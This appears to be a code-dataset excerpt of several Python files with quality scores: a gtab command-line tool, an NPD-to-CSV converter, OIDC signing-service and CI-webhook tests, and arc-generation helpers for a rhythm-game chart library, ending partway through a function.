t.create_anchorbank(verbose=True)
def new_query():
dir_cl, active_gtab = _load_dir_cl()
parser = argparse.ArgumentParser(prog="new_query")
parser.add_argument("kws", type=str, nargs="+")
parser.add_argument("--results_file", type=str, default="query_results.json")
args = parser.parse_args()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() == "":
raise Exception("Must use 'gtab-set-active' first to select the active gtab!")
t.set_active_gtab(active_gtab)
rez = {}
for kw in args.kws:
t_rez = t.new_query(kw)
rez[kw] = copy.deepcopy(t_rez)
rez = json.loads(json.dumps(rez))
print(args.results_file)
os.makedirs(os.path.join(dir_cl, "query_results"), exist_ok=True)
with open(os.path.join(dir_cl, "query_results", args.results_file), 'w') as fp:
json.dump(rez, fp, indent=4) | gtab/command_line.py | import argparse
import copy
import glob
import json
import os
from .core import GTAB
dir_path = os.path.dirname(os.path.abspath(__file__))
# --- UTILITY METHODS ---
class GroupedAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
group, dest = self.dest.split('.', 2)
groupspace = getattr(namespace, group, argparse.Namespace())
setattr(groupspace, dest, values)
setattr(namespace, group, groupspace)
def _load_dir_cl():
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'r') as fp:
dir_cl = json.load(fp)
if dir_cl['dir_cl'].strip() == "":
raise Exception("No active directory set! Must call 'init' first!")
print(dir_cl['active_gtab'])
return dir_cl['dir_cl'], dir_cl['active_gtab']
# --- "EXPOSED" METHODS ---
def init_dir():
parser = argparse.ArgumentParser(prog='init_dir')
parser.add_argument("path", help="Path of the desired directory to be initialized/used.", type=str)
args = parser.parse_args()
path = os.path.abspath(args.path)
t = GTAB(path, from_cli=True)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": path, "active_gtab": "google_anchorbank_geo=_timeframe=2019-01-01 2020-08-01.tsv"}, fp,
indent=4, sort_keys=True)
print("Directory initialized!")
def print_options():
dir_cl, _ = _load_dir_cl()
print(f"Active directory is: {dir_cl}")
t = GTAB(dir_cl, from_cli=True)
t.print_options()
return None
def set_options():
parser = argparse.ArgumentParser(prog="set_options")
parser.add_argument("--geo", type=str, dest="pytrends.geo", action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeframe", type=str, dest='pytrends.timeframe', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchor_candidates", type=int, dest='gtab.num_anchor_candidates', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchors", type=int, dest='gtab.num_anchors', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--seed", type=int, dest='gtab.seed', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--sleep", type=float, dest='gtab.sleep', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--thresh_offline", type=int, dest='gtab.thresh_offline', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--backoff_factor", type=float, dest='conn.backoff_factor', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--proxies", type=str, dest='conn.proxies', action=GroupedAction, default=argparse.SUPPRESS,
nargs="+")
parser.add_argument("--retries", type=int, dest='conn.retries', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeout", type=int, dest='conn.timeout', action=GroupedAction, default=argparse.SUPPRESS,
nargs=2)
args = vars(parser.parse_args())
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_options(pytrends_config=vars(args.get('pytrends')) if args.get('pytrends') != None else None,
gtab_config=vars(args.get('gtab')) if args.get('gtab') != None else None,
conn_config=vars(args.get('conn')) if args.get('conn') != None else None,
overwite_file=True)
def set_blacklist():
parser = argparse.ArgumentParser(prog="set_blacklist")
parser.add_argument("blacklist", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_blacklist(args.blacklist, overwrite_file=True)
def set_hitraffic():
parser = argparse.ArgumentParser(prog="set_hitraffic")
parser.add_argument("hitraffic", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_hitraffic(args.hitraffic, overwrite_file=True)
def list_gtabs():
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.list_gtabs()
def rename_gtab():
parser = argparse.ArgumentParser(prog="rename_gtab")
parser.add_argument("src", type=str)
parser.add_argument("dst", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.rename_gtab(args.src, args.dst)
def delete_gtab():
parser = argparse.ArgumentParser(prog="delete_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.delete_gtab(args.src)
def set_active_gtab():
parser = argparse.ArgumentParser(prog="set_active_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_active_gtab(args.src)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": dir_cl, "active_gtab": args.src}, fp, indent=4, sort_keys=True)
def create_gtab():
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.create_anchorbank(verbose=True)
def new_query():
dir_cl, active_gtab = _load_dir_cl()
parser = argparse.ArgumentParser(prog="new_query")
parser.add_argument("kws", type=str, nargs="+")
parser.add_argument("--results_file", type=str, default="query_results.json")
args = parser.parse_args()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() == "":
raise Exception("Must use 'gtab-set-active' first to select the active gtab!")
t.set_active_gtab(active_gtab)
rez = {}
for kw in args.kws:
t_rez = t.new_query(kw)
rez[kw] = copy.deepcopy(t_rez)
rez = json.loads(json.dumps(rez))
print(args.results_file)
os.makedirs(os.path.join(dir_cl, "query_results"), exist_ok=True)
with open(os.path.join(dir_cl, "query_results", args.results_file), 'w') as fp:
json.dump(rez, fp, indent=4) | 0.327883 | 0.091342 |
import npd
import utilities
import csv
def format_data(input_path: str, output_directory: str, entries: dict):
csv_data = {}
for key in entries:
csv_data[key] = []
with open(input_path, "r") as file:
line_total = len(file.readlines())
with open(input_path, "r") as file:
for line_count in range(line_total):
line = npd.Line(file.readline())
for key, (id, separators) in entries.items():
# Check if line is valid entry.
if line.has_id(id) and line.get_data_count() >= 3:
# Convert the line into an entry.
entry = npd.Entry(id, separators, line)
# Get data and timestamp from entry.
data = entry.get_data()
timestamp = npd.Timestamp(entry.get_time())
# Add time and epoch to data.
data.insert(0, timestamp.get_epoch())
data.insert(0, timestamp.get_time())
# Add data to dictionary.
csv_data[key].append(data)
utilities.progress_bar(line_count / line_total * 100)
# Save data.
print()
for key, rows in csv_data.items():
print("{0}: {1},{2}".format(key, len(rows), len(rows[0])))
input_file = input_path.split("/")[-1].split(".")[0]
output_path = output_directory + "/" + input_file + "-" + key + ".csv"
# Write to csv.
with open(output_path, 'w', newline='') as file:
writer = csv.writer(file, delimiter=',')
for row in rows:
writer.writerow(row)
def main():
path = "./Data/20210122_100221_G.NPD"
output_directory = "./Output"
entries = {
# Title: ( ID, Separators )
"Vessel-GPS" : ( "R44 0", [" ", ","] ),
"Vessel-Gyrocompass" : ( "R104 3", [" ", ","] ),
"ROV-Gyrocompass" : ( "R132 4", [" ", ","] ),
"ROV-HPR" : ( "R496 10", [" ", ","] ),
"ROV-HiPAP-HPR" : ( "P D 3", [" ", " "] ),
"ROV-Digiquartz" : ( "D 3 19 1", [" ", " ", " "] ),
}
format_data(path, output_directory, entries)
if __name__ == "__main__":
main() | Python/format_npd.py | import npd
import utilities
import csv
def format_data(input_path: str, output_directory: str, entries: dict):
csv_data = {}
for key in entries:
csv_data[key] = []
with open(input_path, "r") as file:
line_total = len(file.readlines())
with open(input_path, "r") as file:
for line_count in range(line_total):
line = npd.Line(file.readline())
for key, (id, separators) in entries.items():
# Check if line is valid entry.
if line.has_id(id) and line.get_data_count() >= 3:
# Convert the line into an entry.
entry = npd.Entry(id, separators, line)
# Get data and timestamp from entry.
data = entry.get_data()
timestamp = npd.Timestamp(entry.get_time())
# Add time and epoch to data.
data.insert(0, timestamp.get_epoch())
data.insert(0, timestamp.get_time())
# Add data to dictionary.
csv_data[key].append(data)
utilities.progress_bar(line_count / line_total * 100)
# Save data.
print()
for key, rows in csv_data.items():
print("{0}: {1},{2}".format(key, len(rows), len(rows[0])))
input_file = input_path.split("/")[-1].split(".")[0]
output_path = output_directory + "/" + input_file + "-" + key + ".csv"
# Write to csv.
with open(output_path, 'w', newline='') as file:
writer = csv.writer(file, delimiter=',')
for row in rows:
writer.writerow(row)
def main():
path = "./Data/20210122_100221_G.NPD"
output_directory = "./Output"
entries = {
# Title: ( ID, Separators )
"Vessel-GPS" : ( "R44 0", [" ", ","] ),
"Vessel-Gyrocompass" : ( "R104 3", [" ", ","] ),
"ROV-Gyrocompass" : ( "R132 4", [" ", ","] ),
"ROV-HPR" : ( "R496 10", [" ", ","] ),
"ROV-HiPAP-HPR" : ( "P D 3", [" ", " "] ),
"ROV-Digiquartz" : ( "D 3 19 1", [" ", " ", " "] ),
}
format_data(path, output_directory, entries)
if __name__ == "__main__":
main() | 0.407687 | 0.277069 |
import os
import time
from cryptojwt.jws import factory
from oidcmsg.key_jar import KeyJar
from oidcmsg.oidc import RegistrationRequest
from fedoidcmsg.signing_service import InternalSigningService
from fedoidcmsg.signing_service import WebSigningServiceClient
from fedoidcmsg.signing_service import make_internal_signing_service
from fedoidcmsg.signing_service import make_signing_service
from fedoidcmsg.test_utils import create_keyjars
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
_path = os.path.realpath(__file__)
root_dir, _fname = os.path.split(_path)
KJ = create_keyjars(['https://swamid.sunet.se', 'https://sunet.se',
'https://op.sunet.se'], KEYDEFS, root_dir=root_dir)
class Response(object):
def __init__(self, status_code, text, headers):
self.status_code = status_code
self.text = text
self.headers = headers
def test_make_internal_signing_service():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
assert signing_service.iss == 'https://swamid.sunet.se'
assert len(signing_service.keyjar.issuer_keys['']) == 1
assert len(signing_service.keyjar.issuer_keys[''][0]) == 2
def test_make_web_signing_service():
config = {
'type': 'web',
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'iss': 'https://swamid.sunet.se',
'url': 'https://swamid.sunet.se/mdss'
}
signing_service = make_signing_service(config, 'https://example.com')
assert signing_service.eid == 'https://example.com'
assert signing_service.iss == 'https://swamid.sunet.se'
assert signing_service.url == 'https://swamid.sunet.se/mdss'
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se']) == 1
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se'][0]) == 2
def test_internal_signing_service():
iss = InternalSigningService('https://swamid.sunet.se',
KJ['https://swamid.sunet.se'])
res = iss.sign(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
receiver='https://example.com/rp'
)
_jws = factory(res)
assert _jws.jwt.headers['alg'] == 'RS256'
msg = _jws.jwt.payload()
assert msg['iss'] == 'https://swamid.sunet.se'
assert msg['aud'] == ['https://example.com/rp']
def test_web_signing_service():
_kj = KJ['https://swamid.sunet.se']
iss = InternalSigningService('https://swamid.sunet.se', _kj)
_sms = iss.create(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
'https://example.com/rp'
)
_jwks = _kj.export_jwks()
_vkj = KeyJar()
_vkj.import_jwks(_jwks, 'https://swamid.sunet.se')
wss = WebSigningServiceClient('https://swamid.sunet.se',
'https://swamid.sunet.se/mdss',
'https://example.com/rp', _vkj)
response = Response(200, _sms,
{'Location': 'https://swamid.sunet.se/mdss/abcdefg'})
_res = wss.parse_response(response)
assert set(_res.keys()) == {'sms', 'loc'}
def test_key_rotation():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
signing_service.keyconf = KEYDEFS
signing_service.remove_after = 1
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4
time.sleep(1)
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4 | tests/test_05_signing_service.py | import os
import time
from cryptojwt.jws import factory
from oidcmsg.key_jar import KeyJar
from oidcmsg.oidc import RegistrationRequest
from fedoidcmsg.signing_service import InternalSigningService
from fedoidcmsg.signing_service import WebSigningServiceClient
from fedoidcmsg.signing_service import make_internal_signing_service
from fedoidcmsg.signing_service import make_signing_service
from fedoidcmsg.test_utils import create_keyjars
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
_path = os.path.realpath(__file__)
root_dir, _fname = os.path.split(_path)
KJ = create_keyjars(['https://swamid.sunet.se', 'https://sunet.se',
'https://op.sunet.se'], KEYDEFS, root_dir=root_dir)
class Response(object):
def __init__(self, status_code, text, headers):
self.status_code = status_code
self.text = text
self.headers = headers
def test_make_internal_signing_service():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
assert signing_service.iss == 'https://swamid.sunet.se'
assert len(signing_service.keyjar.issuer_keys['']) == 1
assert len(signing_service.keyjar.issuer_keys[''][0]) == 2
def test_make_web_signing_service():
config = {
'type': 'web',
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'iss': 'https://swamid.sunet.se',
'url': 'https://swamid.sunet.se/mdss'
}
signing_service = make_signing_service(config, 'https://example.com')
assert signing_service.eid == 'https://example.com'
assert signing_service.iss == 'https://swamid.sunet.se'
assert signing_service.url == 'https://swamid.sunet.se/mdss'
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se']) == 1
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se'][0]) == 2
def test_internal_signing_service():
iss = InternalSigningService('https://swamid.sunet.se',
KJ['https://swamid.sunet.se'])
res = iss.sign(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
receiver='https://example.com/rp'
)
_jws = factory(res)
assert _jws.jwt.headers['alg'] == 'RS256'
msg = _jws.jwt.payload()
assert msg['iss'] == 'https://swamid.sunet.se'
assert msg['aud'] == ['https://example.com/rp']
def test_web_signing_service():
_kj = KJ['https://swamid.sunet.se']
iss = InternalSigningService('https://swamid.sunet.se', _kj)
_sms = iss.create(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
'https://example.com/rp'
)
_jwks = _kj.export_jwks()
_vkj = KeyJar()
_vkj.import_jwks(_jwks, 'https://swamid.sunet.se')
wss = WebSigningServiceClient('https://swamid.sunet.se',
'https://swamid.sunet.se/mdss',
'https://example.com/rp', _vkj)
response = Response(200, _sms,
{'Location': 'https://swamid.sunet.se/mdss/abcdefg'})
_res = wss.parse_response(response)
assert set(_res.keys()) == {'sms', 'loc'}
def test_key_rotation():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
signing_service.keyconf = KEYDEFS
signing_service.remove_after = 1
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4
time.sleep(1)
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4 | 0.448909 | 0.322766 |
import pytest
import random
import json
import os
from assets import resource
def test_send_no_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, False)
assert code == 200
assert test_message in message
def test_send_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, True)
assert code == 200
assert test_message in message
def test_get_bool_true():
assert resource.get_bool(True, True)
def test_get_bool_false():
assert not resource.get_bool(False, True)
def test_get_bool_default():
assert resource.get_bool("notaboolean", True)
def test_get_bool_failure():
try:
resource.get_bool(True, "notaboolean")
except Exception as ex:
print(ex)
return
assert False
def test_run_resource_check(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("check", data, "") == ([], True)
def test_run_resource_in(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("in", data, "") == ({"version": {}}, True)
def test_run_resource_out_basic(basic_input, basic_output, env_vars):
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = True
basic_output["metadata"][4]["value"] = "True"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = False
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_message(basic_input, basic_output, env_vars):
del basic_input["params"]["message"]
basic_output["metadata"][1]["value"] = "None"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_message_file(basic_input, basic_output, request, env_vars):
basic_input["params"]["message_file"] = "message.txt"
basic_output["metadata"][2]["value"] = "message.txt"
data = json.dumps(basic_input)
current_dir = request.fspath.dirname
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_missing_message_file(basic_input, basic_output, env_vars):
basic_input["params"]["message_file"] = "not_a_message.txt"
basic_output["metadata"][2]["value"] = "not_a_message.txt"
data = json.dumps(basic_input)
current_dir = os.getcwd()
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_add_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = False
basic_output["metadata"][8]["value"] = "False"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_add_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = False
basic_output["metadata"][3]["value"] = ""
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_webhook_with_params(basic_input, basic_output, env_vars):
basic_input["source"]["webhook_url"] = "https://httpbin.org/post?test=test"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_bad_webhook(basic_input, failure_output):
basic_input["source"]["webhook_url"] = "https://httpbin.org/get"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (failure_output, False)
def test_run_resource_out_missing_webhook(basic_input, failure_output):
del basic_input["source"]["webhook_url"]
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (failure_output, False)
@pytest.fixture
def env_vars():
os.environ["BUILD_PIPELINE_NAME"] = "Test_Pipeline"
os.environ["BUILD_JOB_NAME"] = "Test_Job"
os.environ["BUILD_NAME"] = "1234"
os.environ["BUILD_TEAM_NAME"] = "Test_Team"
os.environ["ATC_EXTERNAL_URL"] = "https://not.a.site"
yield True
del os.environ["BUILD_PIPELINE_NAME"]
del os.environ["BUILD_JOB_NAME"]
del os.environ["BUILD_NAME"]
del os.environ["BUILD_TEAM_NAME"]
del os.environ["ATC_EXTERNAL_URL"]
@pytest.fixture
def basic_input():
return {
"source": {"webhook_url": "https://httpbin.org/post"},
"params": {"message": "Test Message"},
}
@pytest.fixture
def basic_output():
url = "https://not.a.site/teams/Test_Team/pipelines/Test_Pipeline/jobs/Test_Job/builds/1234"
return {
"version": {},
"metadata": [
{"name": "Status", "value": "Posted"},
{"name": "Message", "value": "Test Message"},
{"name": "Message File Name", "value": "None"},
{"name": "Build URL", "value": url},
{"name": "Thread Created", "value": "False"},
{"name": "Pipeline Name", "value": "Test_Pipeline"},
{"name": "Job Name", "value": "Test_Job"},
{"name": "Build Number", "value": "1234"},
{"name": "Info Sent", "value": "True"},
{"name": "Sender Name", "value": None},
{"name": "Sender Display Name", "value": None},
{"name": "Space Name", "value": None},
{"name": "Space Display Name", "value": None},
{"name": "Space Type", "value": None},
{"name": "Thread Name", "value": None},
{"name": "Time Created", "value": None},
],
}
@pytest.fixture
def failure_output():
return {"version": {}, "metadata": [{"name": "status", "value": "Failed"}]} | test_resource.py | import pytest
import random
import json
import os
from assets import resource
def test_send_no_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, False)
assert code == 200
assert test_message in message
def test_send_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, True)
assert code == 200
assert test_message in message
def test_get_bool_true():
assert resource.get_bool(True, True)
def test_get_bool_false():
assert not resource.get_bool(False, True)
def test_get_bool_default():
assert resource.get_bool("notaboolean", True)
def test_get_bool_failure():
try:
resource.get_bool(True, "notaboolean")
except Exception as ex:
print(ex)
return
assert False
def test_run_resource_check(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("check", data, "") == ([], True)
def test_run_resource_in(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("in", data, "") == ({"version": {}}, True)
def test_run_resource_out_basic(basic_input, basic_output, env_vars):
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = True
basic_output["metadata"][4]["value"] = "True"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = False
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_message(basic_input, basic_output, env_vars):
del basic_input["params"]["message"]
basic_output["metadata"][1]["value"] = "None"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_message_file(basic_input, basic_output, request, env_vars):
basic_input["params"]["message_file"] = "message.txt"
basic_output["metadata"][2]["value"] = "message.txt"
data = json.dumps(basic_input)
current_dir = request.fspath.dirname
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_missing_message_file(basic_input, basic_output, env_vars):
basic_input["params"]["message_file"] = "not_a_message.txt"
basic_output["metadata"][2]["value"] = "not_a_message.txt"
data = json.dumps(basic_input)
current_dir = os.getcwd()
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_add_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = False
basic_output["metadata"][8]["value"] = "False"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_add_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = False
basic_output["metadata"][3]["value"] = ""
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_webhook_with_params(basic_input, basic_output, env_vars):
basic_input["source"]["webhook_url"] = "https://httpbin.org/post?test=test"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_bad_webhook(basic_input, failure_output):
basic_input["source"]["webhook_url"] = "https://httpbin.org/get"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (failure_output, False)
def test_run_resource_out_missing_webhook(basic_input, failure_output):
del basic_input["source"]["webhook_url"]
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (failure_output, False)
@pytest.fixture
def env_vars():
os.environ["BUILD_PIPELINE_NAME"] = "Test_Pipeline"
os.environ["BUILD_JOB_NAME"] = "Test_Job"
os.environ["BUILD_NAME"] = "1234"
os.environ["BUILD_TEAM_NAME"] = "Test_Team"
os.environ["ATC_EXTERNAL_URL"] = "https://not.a.site"
yield True
del os.environ["BUILD_PIPELINE_NAME"]
del os.environ["BUILD_JOB_NAME"]
del os.environ["BUILD_NAME"]
del os.environ["BUILD_TEAM_NAME"]
del os.environ["ATC_EXTERNAL_URL"]
@pytest.fixture
def basic_input():
return {
"source": {"webhook_url": "https://httpbin.org/post"},
"params": {"message": "Test Message"},
}
@pytest.fixture
def basic_output():
url = "https://not.a.site/teams/Test_Team/pipelines/Test_Pipeline/jobs/Test_Job/builds/1234"
return {
"version": {},
"metadata": [
{"name": "Status", "value": "Posted"},
{"name": "Message", "value": "Test Message"},
{"name": "Message File Name", "value": "None"},
{"name": "Build URL", "value": url},
{"name": "Thread Created", "value": "False"},
{"name": "Pipeline Name", "value": "Test_Pipeline"},
{"name": "Job Name", "value": "Test_Job"},
{"name": "Build Number", "value": "1234"},
{"name": "Info Sent", "value": "True"},
{"name": "Sender Name", "value": None},
{"name": "Sender Display Name", "value": None},
{"name": "Space Name", "value": None},
{"name": "Space Display Name", "value": None},
{"name": "Space Type", "value": None},
{"name": "Thread Name", "value": None},
{"name": "Time Created", "value": None},
],
}
@pytest.fixture
def failure_output():
return {"version": {}, "metadata": [{"name": "status", "value": "Failed"}]} | 0.345547 | 0.301908 |
# (c)2021 .direwolf <<EMAIL>>
# Licensed under the MIT License.
from typing import Callable, Iterable, List, Literal
from arcfutil.aff.note.notegroup import TimingGroup
from ..note import Arc
from ..note import NoteGroup
from ..note import SceneControl
from ..note import Timing
from random import randint
from ...exception import AffNoteTypeError, AffNoteValueError
from ..easing import get_ease, linear
from copy import deepcopy
def arc_crease_line(
base: Arc,
x_range: float,
y_range: float,
count: int,
mode='m',
easing='s'
) -> NoteGroup:
"""
:param easing:
:param base:
:param x_range:
:param y_range:
:param count:
:param mode: 'm' for regarding base arc as median,
'b' for regarding base arc as border.
:return:
"""
each_len = (base.totime - base.time) / count
arclist = NoteGroup(base[::each_len])
currentx = base.fromx
currenty = base.fromy
if mode == 'm':
for each in arclist:
each.fromx = currentx
each.fromy = currenty
each.tox += x_range
each.toy += y_range
each.slideeasing = easing
x_range = -x_range
y_range = -y_range
currentx = each.tox
currenty = each.toy
elif mode == 'b':
for i in range(1, len(arclist), 2):
arclist[i].fromx += x_range
arclist[i - 1].tox += x_range
arclist[i].fromy += y_range
arclist[i - 1].toy += y_range
arclist[i].slideeasing = easing
arclist[i - 1].slideeasing = easing
else:
raise ValueError('Invalid mode:' + mode)
return arclist
def arc_rain(original_t: int, dest_t: int, step: float, length: float = None):
def max_x(y: int) -> int:
return int(-0.5 * y + 200)
def min_x(y: int) -> int:
return int(0.5 * y)
destgroup = NoteGroup()
if length is None:
length = step
current_time = original_t
while current_time <= dest_t:
rand_y = randint(0, 100)
rand_x = randint(min_x(rand_y), max_x(rand_y))
if dest_t - current_time <= length: # 如果时间不足就截断
actual_dest_t = dest_t
else:
actual_dest_t = int(current_time + length)
destgroup.append(Arc(
current_time,
actual_dest_t,
(rand_x - 50) / 100,
(rand_x - 50) / 100,
's',
rand_y / 100,
rand_y / 100,
0,
True
))
current_time += step
return destgroup
def arc_slice_by_count(arc: Arc, count: int, start: int = None, stop: int = None):
start = start if start is not None else arc.time
stop = stop if stop is not None else arc.totime
if stop < start:
raise AffNoteValueError(
'stop time before start time'
)
step = (stop - start) / count
if step < 1:
step = 1
count = arc.totime - arc.time
destgroup = NoteGroup()
for i in range(count):
destgroup.append(Arc(
start + i * step,
start + (i + 1) * step,
arc[start + i * step][0],
arc[start + (i + 1) * step][0],
's',
arc[start + i * step][1],
arc[start + (i + 1) * step][1],
arc.color,
arc.isskyline,
fx=arc.fx
))
return destgroup
def arc_slice_by_timing(arc: Arc, timings: Iterable):
timepoints = {arc.time, arc.totime}
for each in timings:
if isinstance(each, Timing) and arc.time <= each.time <= arc.totime:
timepoints.add(each.time)
timepoints = sorted(timepoints)
destgroup = NoteGroup()
for i in range(len(timepoints) - 1):
from_time = timepoints[i]
to_time = timepoints[i + 1]
from_slice = arc[from_time]
to_slice = arc[to_time]
temp_arc = Arc(
from_time,
to_time,
from_slice[0],
to_slice[0],
's',
from_slice[1],
to_slice[1],
arc.color,
arc.isskyline
)
if arc.isskyline and arc.skynote:
valid_skynotes = []
for each in arc.skynote:
if from_time <= each < to_time:
valid_skynotes.append(each)
elif each == to_time and i == (len(timepoints) - 2): # 黑线末尾的天键
valid_skynotes.append(each)
temp_arc.skynote = valid_skynotes
destgroup.append(temp_arc)
return destgroup
def arc_animation_assist(
arc: Arc,
start_t: int,
stop_t: int,
delta_x: float,
delta_y: float,
basebpm: float,
easing_x: Callable = linear,
easing_y: Callable = linear,
infbpm: float = 999999,
framerate: float = 60,
fake_note_t: int = 100000,
offset_t: int = 0,
delta_offset_t = 0,
